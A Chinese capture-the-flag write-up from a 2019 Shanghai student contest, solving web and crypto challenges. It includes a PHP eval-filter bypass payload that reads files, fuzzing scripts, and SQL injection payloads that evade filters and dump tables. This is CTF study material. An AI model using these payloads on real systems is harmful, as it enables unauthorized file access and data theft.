2019上海大学生网络安全大赛

Web

Decade

题目源码

<?php
highlight_file(__FILE__);
$code = $_GET['code'];
if (!empty($code)) {
        if (';' === preg_replace('/[a-z]+\((?R)?\)/', NULL, $code)) {
            if (preg_match('/readfile|if|time|local|sqrt|et|na|nt|strlen|info|path|rand|dec|bin|hex|oct|pi|exp|log/i', $code)) {
                    echo 'bye~';
                } else {
                    eval($code);
                }
            }
        else {
            echo "No way!!!";
        }
}else {
        echo "No way!!!";
    }

这题跟字节跳动那题差不多，不过比字节跳动那题限制的多一点，这里记录一下

/[a-z]+$(?R)?$/这个正则表达式的意思是仅支持无参函数，并且函数名只能为字母，但支持函数套用，如果最后只剩下;就会通过这个正则表达式

第二个正则表达式是限制了这么多函数不能用，那还有什么函数能用呢？接下来就fuzz一下

<?php
    $len = count(get_defined_functions()['internal']);
    $i_need_func = array();
    $j = 0;
    for ($i = 0; $i < $len; $i++){
        if (!preg_match('/readfile|if|time|local|sqrt|et|na|nt|strlen|info|path|rand|dec|bin|hex|oct|pi|exp|log/i', get_defined_functions()['internal'][$i])){
            if (!strpos(get_defined_functions()['internal'][$i],'_')){
                $i_need_func[$j] = get_defined_functions()['internal'][$i];
                $j++;
            }
        }
    }

发现剩下307个可用函数，根据题目，我们可以知道flag在上层目录，因此需要使用chdir跳转，但是chdir只会返回bool值，我们需要找一个函数接受布尔值并且可以输出”.”

我们先考虑如何读取当前目录下的文件

在php里面读取文件的函数如下：

fgetc — 从文件指针中读取字符
fgets — 从文件指针中读取一行
fgetss — 从文件指针中读取一行并过滤掉 HTML 标记
file_get_contents — 将整个文件读入一个字符串
file — 把整个文件读入一个数组中
fopen — 打开文件或者 URL
fread — 读取文件（可安全用于二进制文件）
readfile — 输出文件

在php里面关于文件目录操作的函数如下:

basename( )  //返回路径中的文件名部分
chdir()    //改变当前的目录
dirname( ) //返回路径中的目录部分
getcwd()    //返回当前工作目录
pathinfo( ) //返回文件路径的信息
opendir( ) //打开目录句柄
readdir( ) //从目录句柄中读取条目，返回目录中下一个文件的文件名
rewinddir( ) //重置目录句柄
closedir( ) //关闭目录句柄
mkdir( ) //新建目录
rmdir( ) //删除指定的空目录
scandir( ) //列出指定路径中的文件和目录

这里我们选择scandir，那么.怎么得到呢？.的ascii是46，我们可以通过chr(46)来得到.表示当前目录，接下来就要考虑怎么得到46了

fuzz一下不需要输入参数就能得到返回的函数

import requests
str = "strcmp,strncmp,strcasecmp,strncasecmp,each,define,defined,date,idate,gmdate,checkdate,readgzfile,gzrewind,gzclose,gzeof,gzread,gzopen,gzpassthru,gzseek,gztell,gzwrite,gzputs,gzfile,gzcompress,gzuncompress,gzdeflate,gzinflate,gzencode,bcadd,bcsub,bcmul,bcdiv,bcmod,bcpow,bcscale,bccomp,bcpowmod,bzopen,bzread,bzwrite,bzflush,bzclose,bzerrno,bzerrstr,bzerror,bzcompress,jdtogregorian,jdtojulian,jdtojewish,jewishtojd,jdtofrench,frenchtojd,jddayofweek,unixtojd,jdtounix,imagearc,imageellipse,imagechar,imagecharup,imagecolorat,imagecolorallocate,imagecreatefromstring,imagecolorclosest,imagecolorclosesthwb,imagecolordeallocate,imagecolorresolve,imagecolorexact,imagecolorstotal,imagecolorsforindex,imagecopy,imagecopymerge,imagecopymergegray,imagecopyresized,imagecreate,imageistruecolor,imagefilledarc,imagefilledellipse,imagealphablending,imagesavealpha,imagecolorallocatealpha,imagecolorresolvealpha,imagecolorclosestalpha,imagecolorexactalpha,imagecopyresampled,imagerotate,imageflip,imagecrop,imagecropauto,imagescale,imageaffine,imageaffinematrixconcat,imagecreatefrompng,imagecreatefromjpeg,imagecreatefromwbmp,imagecreatefromxbm,imagecreatefromgd,imagecreatefromgd2,imagecreatefromgd2part,imagepng,imagejpeg,imagewbmp,imagegd,imagegd2,imagedestroy,imagegammacorrect,imagefill,imagefilledpolygon,imagefilledrectangle,imagefilltoborder,imageline,imagepolygon,imagerectangle,imagestring,imagestringup,imagesx,imagesy,imagedashedline,jpeg2wbmp,png2wbmp,image2wbmp,imagelayereffect,imagexbm,imagecolormatch,imagefilter,imageconvolution,hash,iconv,mbereg,mberegi,mbsplit,snmpwalk,snmprealwalk,snmpwalkoid,sleep,usleep,flush,wordwrap,htmlspecialchars,sha1,md5,crc32,iptcparse,iptcembed,phpversion,phpcredits,strspn,strcspn,strtok,strtoupper,strtolower,strpos,stripos,strrpos,strripos,strrev,hebrev,hebrevc,nl2br,stripslashes,stripcslashes,strstr,stristr,strrchr,strpbrk,strcoll,substr,ucfirst,lcfirst,ucwords,strtr,addslashes,addcslashes,rtrim,trim,ltrim,implode,join,soundex,levenshtein,chr,ord,chop,strchr,sscanf,fscanf,urlencode,rawurlencode,readlink,symlink,link,unlink,exec,system,escapeshellcmd,escapeshellarg,passthru,abs,ceil,floor,round,sin,cos,tan,asin,acos,atan,atanh,atan2,sinh,cosh,tanh,asinh,acosh,pow,hypot,deg2rad,rad2deg,fmod,ip2long,long2ip,putenv,uniqid,serialize,unserialize,header,checkdnsrr,floatval,doubleval,strval,boolval,pclose,popen,rewind,rmdir,umask,fclose,feof,fread,fopen,fpassthru,ftruncate,fstat,fseek,ftell,fflush,fwrite,fputs,mkdir,copy,tmpfile,file,fputcsv,flock,fnmatch,fsockopen,pfsockopen,pack,unpack,crypt,opendir,closedir,chdir,rewinddir,readdir,dir,scandir,glob,filegroup,fileinode,fileowner,fileperms,filesize,stat,lstat,chown,chgrp,lchown,lchgrp,chmod,touch,clearstatcache,diskfreespace,mail,ksort,krsort,asort,arsort,sort,rsort,usort,uasort,uksort,shuffle,end,prev,next,key,min,max,extract,compact,range,pos,sizeof,assert,ftok,virtual"
func = str.split(',')
url = "http://localhost/code/code/code.php?code=%s"
for i in func:
    test = "echo(%s());" % i
    url = "http://localhost/code/code/code.php?code=%s" % test
    res = requests.get(url)
    if "Warning" in res.content:
        pass
    elif "No way!!!" in res.content:
        pass
    elif "<" in res.content:
        pass
    elif len(res.content) == 0:
        pass
    else:
        print i+": "+res.content

得到

phpcredits — 打印 PHP 贡献者名单
unixtojd: — 转变Unix时间戳为Julian Day计数
phpversion: — 返回当前的PHP版本
uniqid: — 基于以微秒计的当前时间，生成一个唯一的 ID
umask: — 返回当前的 umask
tmpfile: — 以读写（w+）模式建立一个具有唯一文件名的临时文件

fuzz一下只需要一个参数的函数

import requests
str = "strcmp,strncmp,strcasecmp,strncasecmp,each,define,defined,date,idate,gmdate,checkdate,readgzfile,gzrewind,gzclose,gzeof,gzread,gzopen,gzpassthru,gzseek,gztell,gzwrite,gzputs,gzfile,gzcompress,gzuncompress,gzdeflate,gzinflate,gzencode,bcadd,bcsub,bcmul,bcdiv,bcmod,bcpow,bcscale,bccomp,bcpowmod,bzopen,bzread,bzwrite,bzflush,bzclose,bzerrno,bzerrstr,bzerror,bzcompress,jdtogregorian,jdtojulian,jdtojewish,jewishtojd,jdtofrench,frenchtojd,jddayofweek,unixtojd,jdtounix,imagearc,imageellipse,imagechar,imagecharup,imagecolorat,imagecolorallocate,imagecreatefromstring,imagecolorclosest,imagecolorclosesthwb,imagecolordeallocate,imagecolorresolve,imagecolorexact,imagecolorstotal,imagecolorsforindex,imagecopy,imagecopymerge,imagecopymergegray,imagecopyresized,imagecreate,imageistruecolor,imagefilledarc,imagefilledellipse,imagealphablending,imagesavealpha,imagecolorallocatealpha,imagecolorresolvealpha,imagecolorclosestalpha,imagecolorexactalpha,imagecopyresampled,imagerotate,imageflip,imagecrop,imagecropauto,imagescale,imageaffine,imageaffinematrixconcat,imagecreatefrompng,imagecreatefromjpeg,imagecreatefromwbmp,imagecreatefromxbm,imagecreatefromgd,imagecreatefromgd2,imagecreatefromgd2part,imagepng,imagejpeg,imagewbmp,imagegd,imagegd2,imagedestroy,imagegammacorrect,imagefill,imagefilledpolygon,imagefilledrectangle,imagefilltoborder,imageline,imagepolygon,imagerectangle,imagestring,imagestringup,imagesx,imagesy,imagedashedline,jpeg2wbmp,png2wbmp,image2wbmp,imagelayereffect,imagexbm,imagecolormatch,imagefilter,imageconvolution,hash,iconv,mbereg,mberegi,mbsplit,snmpwalk,snmprealwalk,snmpwalkoid,sleep,usleep,flush,wordwrap,htmlspecialchars,sha1,md5,crc32,iptcparse,iptcembed,phpversion,phpcredits,strspn,strcspn,strtok,strtoupper,strtolower,strpos,stripos,strrpos,strripos,strrev,hebrev,hebrevc,nl2br,stripslashes,stripcslashes,strstr,stristr,strrchr,strpbrk,strcoll,substr,ucfirst,lcfirst,ucwords,strtr,addslashes,addcslashes,rtrim,trim,ltrim,implode,join,soundex,levenshtein,chr,ord,chop,strchr,sscanf,fscanf,urlencode,rawurlencode,readlink,symlink,link,unlink,exec,system,escapeshellcmd,escapeshellarg,passthru,abs,ceil,floor,round,sin,cos,tan,asin,acos,atan,atanh,atan2,sinh,cosh,tanh,asinh,acosh,pow,hypot,deg2rad,rad2deg,fmod,ip2long,long2ip,putenv,uniqid,serialize,unserialize,header,checkdnsrr,floatval,doubleval,strval,boolval,pclose,popen,rewind,rmdir,umask,fclose,feof,fread,fopen,fpassthru,ftruncate,fstat,fseek,ftell,fflush,fwrite,fputs,mkdir,copy,tmpfile,file,fputcsv,flock,fnmatch,fsockopen,pfsockopen,pack,unpack,crypt,opendir,closedir,chdir,rewinddir,readdir,dir,scandir,glob,filegroup,fileinode,fileowner,fileperms,filesize,stat,lstat,chown,chgrp,lchown,lchgrp,chmod,touch,clearstatcache,diskfreespace,mail,ksort,krsort,asort,arsort,sort,rsort,usort,uasort,uksort,shuffle,end,prev,next,key,min,max,extract,compact,range,pos,sizeof,assert,ftok,virtual"
func = str.split(',')
url = "http://localhost/code/code/code.php?code=%s"
arr = []
for i in func:
    test = "echo(%s());" % i
    url = "http://localhost/code/code/code.php?code=%s" % test
    res = requests.get(url)
    if "1 parameter" in res.content:
        arr.append(i)
print arr

得到

['each', 'defined', 'date', 'idate', 'gmdate', 'readgzfile', 'gzrewind', 'gzclose', 'gzeof', 'gzpassthru', 'gztell', 'gzfile', 'gzcompress', 'gzuncompress', 'gzdeflate', 'gzinflate', 'gzencode', 'bcscale', 'bzread', 'bzflush', 'bzclose', 'bzerrno', 'bzerrstr', 'bzerror', 'bzcompress', 'jdtogregorian', 'jdtojulian', 'jdtojewish', 'jdtofrench', 'jddayofweek', 'jdtounix', 'imagecreatefromstring', 'imagecolorstotal', 'imageistruecolor', 'imagecropauto', 'imagecreatefrompng', 'imagecreatefromjpeg', 'imagecreatefromwbmp', 'imagecreatefromxbm', 'imagecreatefromgd', 'imagepng', 'imagejpeg', 'imagewbmp', 'imagegd', 'imagedestroy', 'imagesx', 'imagesy', 'sleep', 'usleep', 'wordwrap', 'htmlspecialchars', 'iptcparse', 'strtok', 'strtoupper', 'strtolower', 'strrev', 'hebrev', 'hebrevc', 'stripslashes', 'stripcslashes', 'ucfirst', 'lcfirst', 'ucwords', 'addslashes', 'rtrim', 'trim', 'ltrim', 'implode', 'join', 'soundex', 'ord', 'chop', 'urlencode', 'rawurlencode', 'readlink', 'unlink', 'exec', 'system', 'escapeshellcmd', 'escapeshellarg', 'passthru', 'abs', 'ceil', 'floor', 'round', 'sin', 'cos', 'tan', 'asin', 'acos', 'atan', 'atanh', 'sinh', 'cosh', 'tanh', 'asinh', 'acosh', 'putenv', 'serialize', 'unserialize', 'header', 'checkdnsrr', 'floatval', 'doubleval', 'strval', 'boolval', 'pclose', 'rewind', 'rmdir', 'fclose', 'feof', 'fpassthru', 'fstat', 'ftell', 'fflush', 'mkdir', 'file', 'fsockopen', 'pfsockopen', 'pack', 'crypt', 'opendir', 'chdir', 'dir', 'scandir', 'glob', 'filegroup', 'fileinode', 'fileowner', 'fileperms', 'filesize', 'stat', 'lstat', 'touch', 'diskfreespace', 'ksort', 'krsort', 'asort', 'arsort', 'sort', 'rsort', 'shuffle', 'end', 'prev', 'next', 'key', 'min', 'max', 'extract', 'compact', 'pos', 'sizeof', 'assert', 'virtual']

通过搜索与测试，chr(ord(hebrevc(crypt(phpversion()))))即chr(ord(hebrevc(crypt(1))))可以得到.和$两种结果，多试几次就可以比较容易得到.，于是直接采用这个方法，得到.之后，使用scandir和next可以得到..

在PHP中有一组函数是关于操作数组内部指针指向的函数

current() - 返回数组中的当前元素的值
pos() - 函数返回数组中的当前元素的值。
next() - 将内部指针指向数组中的下一个元素，并输出
prev() - 将内部指针指向数组中的上一个元素，并输出
reset() - 将内部指针指向数组中的第一个元素，并输出
each() - 返回当前元素的键名和键值，并将内部指针向前移动

接下来使用chdir返回上一级目录，成功会返回1，因此这里重复第一步构造一个点，然后扫描当前目录，通过end函数获得文件名，使用file函数将整个文件读入数组再使用implode就可以读取文件内容了，最终payload：

1	echo(implode(file(end(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(chr(ord(hebrevc(crypt(phpversion()))))))))))))))));

更详细请参考：https://www.freebuf.com/column/221178.html

Babyt5

安恒月赛题

https://www.jianshu.com/p/804d95f6d6fb

easysql

手动测试了一下，过滤了,、and、or、union select，union select可用union all select绕过

参考此篇文章进行bypass

https://drops.blbana.cc/2017/05/20/SQLi-%E2%80%94%E2%80%94-%E9%80%97%E5%8F%B7%EF%BC%8C%E7%A9%BA%E6%A0%BC%EF%BC%8C%E5%AD%97%E6%AE%B5%E5%90%8D%E8%BF%87%E6%BB%A4%E7%AA%81%E7%A0%B4/#0x01-%E6%B5%8B%E8%AF%95

database：cccttffff

1	?id=' union all select * from ((select 1)a join (select database())b join (select 3)c join (select 4)d)%23

由于information无法使用，因此使用mysql.innodb_table_stats代替information_schema.tables

table：article,fl111aa44a99g

1	?id=' union all select * from ((select 1)a join (select database())b join (select 3)c join (select group_concat(table_name) from mysql.innodb_table_stats where database_name=database())d)%23

接下来就是无列名注入get flag

?id=' union all select * from ((select 1)a join (select F.3 from (select * from (select 1)u join (select 2)i join (select 3)o union all select * from fl111aa44a99g limit 1 offset 1)F)b join (select 3)c join (select 4)d)%23

Crypto

RSA

根据题目条件计算得到p+q

n = 9538795663851271297602738029671089878718012242935213096566250130325046936720540247534143498025477544161347330379679111765871420732255741210434736423951962189227302658997497664520929375215715960063615792480965807127438948044298348300153102760490410578638259665656608784635088735809470916136628779400145983632930861883762707606629208260803446083579674497451514650309351925430391515629898218875049677870989016071086844819626778388370764400242376469343158294638240660190754978627356076115228410162956087266527271225439142347304100660800517276772407728290414074912243665126741030948775883739544952378188264714716087909797
s1 = 19077591327702542595205476059342179757436024485870426193132500260650093873441080495068286996050955088322694660759358223531742841464511482420869472847903924378454605317994995329041858750431431920127231584961931614254877896088596696600306205520980821157276519331313217569270177471618941832273257558800291967266057799408185825199394392306374394195697993019961311696247374832761757990150416392201444079060627610573918631913438062954960835929982836033906925917632413007648356037059843552967726871763559759125837289869091638924336309932526582201350695938677991368335828814565265478203873169858685929462350511138398905572292
s2 = 9538795663851271297602738029671089878718012242935213096566250130325046936720540247534143498025477544161347330379679111765871420732255741210434736423951962189227302658997497664520929375215715960063615792480965807127438948044298348300153102760490410578638259665656608784635088735809470916136628779400145983632930861883762707606629208260803446083579674497451514650309351925430391515629898218875049677870989016071086844819626778388370764400242376469343158294638240660190754978627356076115228410162956087266527271225439142347304100660800517276772407728290414074912243665126741030948775883739544952378188264714716087909797
print s1 * n / s2 - 2 * n

p+q

196075640660409986135975784767502028538644025058282395628670981900974958890619954451344723318649578431744942274184506178219307129498083095220609328355931687266846079805131400737270051437647584592782747418213354229728108610925547647805880482097163218511341484311783416306321402379596024705973981708966729752698

通过z3求解方程即可算出p、q

from z3 import *
p = Int('p')
q = Int('q')
s = Solver()
s.add(p*q == 9538795663851271297602738029671089878718012242935213096566250130325046936720540247534143498025477544161347330379679111765871420732255741210434736423951962189227302658997497664520929375215715960063615792480965807127438948044298348300153102760490410578638259665656608784635088735809470916136628779400145983632930861883762707606629208260803446083579674497451514650309351925430391515629898218875049677870989016071086844819626778388370764400242376469343158294638240660190754978627356076115228410162956087266527271225439142347304100660800517276772407728290414074912243665126741030948775883739544952378188264714716087909797)
s.add(p+q == 196075640660409986135975784767502028538644025058282395628670981900974958890619954451344723318649578431744942274184506178219307129498083095220609328355931687266846079805131400737270051437647584592782747418213354229728108610925547647805880482097163218511341484311783416306321402379596024705973981708966729752698)
s.check()
model = s.model()
print model

89516168421901993249082527171566896585255089161654435795639393653714938085176717624166720396457043359717304975102306007578654871083121175803454922681698922194906414804214604517410856199189184886589639271288946105569496874593987805690922703821405554650664707364293232855974170175729835163792122422002418728851

106559472238507992886893257595935131953388935896627959833031588247260020805443236827178002922192535072027637299082200170640652258414961919417154405674232765071939665000916796219859195238458399706193108146924408124158611736331559842114957778275757663860676776947490183450347232203866189542181859286964311023847

通过pow(123,e,n)爆破e，得到e=251

import gmpy2
import binascii
p = 89516168421901993249082527171566896585255089161654435795639393653714938085176717624166720396457043359717304975102306007578654871083121175803454922681698922194906414804214604517410856199189184886589639271288946105569496874593987805690922703821405554650664707364293232855974170175729835163792122422002418728851
q = 106559472238507992886893257595935131953388935896627959833031588247260020805443236827178002922192535072027637299082200170640652258414961919417154405674232765071939665000916796219859195238458399706193108146924408124158611736331559842114957778275757663860676776947490183450347232203866189542181859286964311023847
c1 = 368284101618076523549199130884422355928051525996327977632544904437878504262870825378516827225793010165434494157238379685995430409966951122729243411694569562164062815098110639750101378457641471316188502263725098231679401928494160942213175404259256770984218593245458108598930926260386443799301699336309331946341173652201791293571029025818674575198311845811957606474490230382511996537893448524426809391980637983473305318819523408854264623254226127223862150173575206444726570183096891630129244778802793476295746913846105454198627
c = 7303495910407762399046490836902121070389476875516762048462433039234972742941586801378979220008051262826174054961747648114128456872349675769941760630519744351742977740846748646739901172672743584989842268056810152117350241337045055812845489372389014195433916347255846499434232234822333192328886207187844781726928951986353054876826105507064928478812402103648940709131760865763234071703554208057808885564381400571862422316195578258814602362582573148358552148686182480215663291366798585241933446701357953551496955627421526567152576426417189707335038601040167826900549139608192971559659991213411381604721734898065256138516
n = 9538795663851271297602738029671089878718012242935213096566250130325046936720540247534143498025477544161347330379679111765871420732255741210434736423951962189227302658997497664520929375215715960063615792480965807127438948044298348300153102760490410578638259665656608784635088735809470916136628779400145983632930861883762707606629208260803446083579674497451514650309351925430391515629898218875049677870989016071086844819626778388370764400242376469343158294638240660190754978627356076115228410162956087266527271225439142347304100660800517276772407728290414074912243665126741030948775883739544952378188264714716087909797
phi = (p-1)*(q-1)
e = 251
d = gmpy2.invert(e,phi)
flag = pow(c,d,n)
print (binascii.unhexlify(hex(flag)[2:]))
# for i in range(1,1000):
#     c2 = pow(123,i,n)
#     if c2 == c1:
#         print i
#         break

poly

通过多项式域上的二元一次方程恢复k1、k2，再通过一元一次方程求出msg0、msg1

import binascii
P=PolynomialRing(GF(2),'x')
F.<x> = GF(2)[]
pol = x**255+ x**143+ x**47 + x**3 + 1
FF = GF(2**256)
r1 = 0xbd94909c0e247c276ef6816797dd2b176337a430269f4f9df7ea14923a1a
r2 = 0xc1fef44fd4d870d00622e1f40779a2a83a64ab693c54780960b043d4d2ea
c1 = 0x0000bd94909c0e247c276ef6816797dd2b176337a430269f4f9df7ea14923a1a
c2 = 0x0000c1fef44fd4d870d00622e1f40779a2a83a64ab693c54780960b043d4d2ea
m1 = 0x0000476f6f6421546869735f69735f666c61673a666c61677b36303639636166
m2 = 0x0000362d303965312d343934612d626362352d6239346538663238383937317d
# get poly
c1 = P(FF.fetch_int(c1))
c2 = P(FF.fetch_int(c2))
r1 = P(FF.fetch_int(r1))
r2 = P(FF.fetch_int(r2))
m1 = P(FF.fetch_int(m1))
m2 = P(FF.fetch_int(m2))
# print c1
k1 = (c1-c2)*inverse_mod(r1-r2,pol)
k2 = c1-k1*r1
msg0 = (m1-k2)*inverse_mod(k1,pol)%pol
msg1 = (m2-k2)*inverse_mod(k1,pol)%pol
# get int
msg0 = FF(msg0).integer_representation()
msg1 = FF(msg1).integer_representation()
print msg0
print msg1
print binascii.a2b_hex(hex(msg0)[2:-1])
print binascii.a2b_hex(hex(msg1)[2:-1])

poly_rev

跟poly一样